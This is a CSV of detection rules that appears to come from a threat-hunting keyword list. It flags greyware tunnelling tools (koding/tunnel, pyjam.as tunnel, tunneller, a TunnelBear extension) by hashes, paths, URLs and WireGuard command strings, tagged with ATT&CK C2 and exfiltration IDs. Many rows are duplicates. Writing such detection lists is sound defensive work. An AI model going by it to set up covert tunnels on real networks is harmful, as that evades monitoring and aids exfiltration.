"*9e3c014399ad61b61a1fa5fa58de95a4ddfded6ff863c413cea089f2d92f9d70*",".{0,1000}9e3c014399ad61b61a1fa5fa58de95a4ddfded6ff863c413cea089f2d92f9d70.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*c9165f1628aa7d5a75b907d71efda4fa4ab1fa8bb2ee12ef86478ef6e2c3e162*",".{0,1000}c9165f1628aa7d5a75b907d71efda4fa4ab1fa8bb2ee12ef86478ef6e2c3e162.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","#filehash","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z"
"*e82ae72bb202db9bae86dc81cf4df152b6d8d3b5062295004b8ae92088904dc7*",".{0,1000}e82ae72bb202db9bae86dc81cf4df152b6d8d3b5062295004b8ae92088904dc7.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","#filehash","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z"
"*github*koding/tunnel*",".{0,1000}github.{0,1000}koding\/tunnel.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","1","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z"
"*http://arslan.koding.io/*",".{0,1000}http\:\/\/arslan\.koding\.io\/.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","1","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z"
"*https://tunnel.pyjam.as/*",".{0,1000}https\:\/\/tunnel\.pyjam\.as\/.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://www.wireguard.com/install*",".{0,1000}https\:\/\/www\.wireguard\.com\/install.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*tunnel/httpproxy.go*",".{0,1000}tunnel\/httpproxy\.go.{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z"
"*wg-quick down ./tunnel.conf*",".{0,1000}wg\-quick\sdown\s\.\/tunnel\.conf.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*wg-quick up ./tunnel.conf*",".{0,1000}wg\-quick\sup\s\.\/tunnel\.conf.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Write Wireguard server configuration to disk.*",".{0,1000}Write\sWireguard\sserver\sconfiguration\sto\sdisk\..{0,1000}","greyware_tool_keyword","tunnel","Tunnel is a server/client package that enables to proxy public connections to your local machine over a tunnel connection from the local machine to the public server. What this means is, you can share your localhost even if it doesn't have a Public IP or if it's not reachable from outside","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/koding/tunnel","1","0","N/A","N/A","10","10","319","71","2023-10-20T13:43:58Z","2015-05-28T07:26:42Z"
"*Write Wireguard server configuration to disk.*",".{0,1000}Write\sWireguard\sserver\sconfiguration\sto\sdisk\..{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/bin/bash -c 'wg addconf *",".{0,1000}\/bin\/bash\s\-c\s\'wg\saddconf\s.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/etc/wireguard/*.conf*",".{0,1000}\/etc\/wireguard\/.{0,1000}\.conf.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/root/tunnel*",".{0,1000}\/root\/tunnel.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*9e3c014399ad61b61a1fa5fa58de95a4ddfded6ff863c413cea089f2d92f9d70*",".{0,1000}9e3c014399ad61b61a1fa5fa58de95a4ddfded6ff863c413cea089f2d92f9d70.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*Overwrite by setting TUNNEL_WG_INTERFACE_NAME*",".{0,1000}Overwrite\sby\ssetting\sTUNNEL_WG_INTERFACE_NAME.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*pyjam.as/tunnel*",".{0,1000}pyjam\.as\/tunnel.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*tunnel.pyjam.as*",".{0,1000}tunnel\.pyjam\.as.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*TUNNEL_WG_INTERFACE_NAME=*",".{0,1000}TUNNEL_WG_INTERFACE_NAME\=.{0,1000}","greyware_tool_keyword","tunnel.pyjam.as","SSL-terminated ephemeral HTTP tunnels to your local machine - no custom software required (thanks to wireguard)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*omdakjcmkglenbhjadbccaookpfjihpa*",".{0,1000}omdakjcmkglenbhjadbccaookpfjihpa.{0,1000}","greyware_tool_keyword","TunnelBear VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*/tunneller.git*",".{0,1000}\/tunneller\.git.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller/releases/*",".{0,1000}\/tunneller\/releases\/.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-darwin-amd64*",".{0,1000}\/tunneller\-darwin\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-darwin-amd64*",".{0,1000}\/tunneller\-darwin\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-darwin-amd64*",".{0,1000}\/tunneller\-darwin\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-darwin-amd64*",".{0,1000}\/tunneller\-darwin\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-darwin-i386*",".{0,1000}\/tunneller\-darwin\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-darwin-i386*",".{0,1000}\/tunneller\-darwin\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-darwin-i386*",".{0,1000}\/tunneller\-darwin\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-darwin-i386*",".{0,1000}\/tunneller\-darwin\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-freebsd-amd64*",".{0,1000}\/tunneller\-freebsd\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-freebsd-amd64*",".{0,1000}\/tunneller\-freebsd\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-freebsd-amd64*",".{0,1000}\/tunneller\-freebsd\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-freebsd-amd64*",".{0,1000}\/tunneller\-freebsd\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-freebsd-i386*",".{0,1000}\/tunneller\-freebsd\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-freebsd-i386*",".{0,1000}\/tunneller\-freebsd\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-freebsd-i386*",".{0,1000}\/tunneller\-freebsd\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-freebsd-i386*",".{0,1000}\/tunneller\-freebsd\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-linux-amd64*",".{0,1000}\/tunneller\-linux\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-linux-amd64*",".{0,1000}\/tunneller\-linux\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-linux-amd64*",".{0,1000}\/tunneller\-linux\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-linux-amd64*",".{0,1000}\/tunneller\-linux\-amd64.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-linux-i386*",".{0,1000}\/tunneller\-linux\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-linux-i386*",".{0,1000}\/tunneller\-linux\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-linux-i386*",".{0,1000}\/tunneller\-linux\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*/tunneller-linux-i386*",".{0,1000}\/tunneller\-linux\-i386.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","1","N/A","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*087dae4b718907c400d19d3e497619042ad74036da714be2812ab423e0a86e84*",".{0,1000}087dae4b718907c400d19d3e497619042ad74036da714be2812ab423e0a86e84.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*1556d7d7fe7f2342854a24b05c3eca7e593d7e22021c559118c3fde32950bfd0*",".{0,1000}1556d7d7fe7f2342854a24b05c3eca7e593d7e22021c559118c3fde32950bfd0.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*23588b81078e4ce796050b5eb3f87e37be16233d45ca17e222be509445127a3f*",".{0,1000}23588b81078e4ce796050b5eb3f87e37be16233d45ca17e222be509445127a3f.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*2d5d5cd63277002d698485c5a87a51c1c8d520a963ae1c1689c9e6c5c4964c0c*",".{0,1000}2d5d5cd63277002d698485c5a87a51c1c8d520a963ae1c1689c9e6c5c4964c0c.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*4f91e07aba2c4e94121f45cfb8252d2e173d565a4a15faacd7b3fa3f78b0d978*",".{0,1000}4f91e07aba2c4e94121f45cfb8252d2e173d565a4a15faacd7b3fa3f78b0d978.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*51921c04f725490abfce3611cef91f602314bb272240d7d4a252bf16a2199154*",".{0,1000}51921c04f725490abfce3611cef91f602314bb272240d7d4a252bf16a2199154.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*5370c48e778806b0676a70e133a32a7ed674ad22545bb61e120198236504245a*",".{0,1000}5370c48e778806b0676a70e133a32a7ed674ad22545bb61e120198236504245a.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*582b8f96d51ff83c2daf3970faa3c141a18dc8b1af0b23a3dc40aee1d04c6702*",".{0,1000}582b8f96d51ff83c2daf3970faa3c141a18dc8b1af0b23a3dc40aee1d04c6702.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*6c23f9dc5552c6286c852faa91236587470efaf28af92c5b4742feac70ffed6b*",".{0,1000}6c23f9dc5552c6286c852faa91236587470efaf28af92c5b4742feac70ffed6b.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*6f072e5783a999399690a8fbb7aff14f818746a910165bb7514576bf9ef179da*",".{0,1000}6f072e5783a999399690a8fbb7aff14f818746a910165bb7514576bf9ef179da.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*70bac6ab24591aa3df6592daacec697e11fdf865e3f27b8ccb7fa5a65934d96d*",".{0,1000}70bac6ab24591aa3df6592daacec697e11fdf865e3f27b8ccb7fa5a65934d96d.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*86f182e121994ab7f27c9936c947bf21151dbaa1a2c94640c9b3493e3101c98a*",".{0,1000}86f182e121994ab7f27c9936c947bf21151dbaa1a2c94640c9b3493e3101c98a.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*8bbfc29e4494eaa861f1e8ceea0982279cae939a7cbe4a6606919e07a67b85bc*",".{0,1000}8bbfc29e4494eaa861f1e8ceea0982279cae939a7cbe4a6606919e07a67b85bc.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*959dfbb8cd213bd33aa99fcf4494c61397dc39685f43806ddd9804798d4c94cb*",".{0,1000}959dfbb8cd213bd33aa99fcf4494c61397dc39685f43806ddd9804798d4c94cb.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*9f6b80fa0ffaad84c92776eaa2af7a16d5fcb724ac12ed9a07dffd88565c6397*",".{0,1000}9f6b80fa0ffaad84c92776eaa2af7a16d5fcb724ac12ed9a07dffd88565c6397.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*a17972b286ec9492e224a2adcc4ec7487615caec87a04be7d7a1c0bbfc0f0b43*",".{0,1000}a17972b286ec9492e224a2adcc4ec7487615caec87a04be7d7a1c0bbfc0f0b43.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*a857a9f7a34b247348439a6b13dda18e4aafa381eb7d50215610d9d360d68485*",".{0,1000}a857a9f7a34b247348439a6b13dda18e4aafa381eb7d50215610d9d360d68485.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*aca3bacd0f7f2a5e75ed74643e1fbb57ec10dc94f675dab12f8d7aeb48c3a503*",".{0,1000}aca3bacd0f7f2a5e75ed74643e1fbb57ec10dc94f675dab12f8d7aeb48c3a503.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
"*ae4e32d838b180b920722598fa8cc91533742f1bc53805520b372f1f210d6833*",".{0,1000}ae4e32d838b180b920722598fa8cc91533742f1bc53805520b372f1f210d6833.{0,1000}","greyware_tool_keyword","tunneller","Tunneller allows you to expose services which are running on localhost or on your local network to the public internet.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/skx/tunneller","1","0","#filehash","N/A","10","10","474","41","2024-08-13T07:36:22Z","2019-04-21T11:05:11Z"
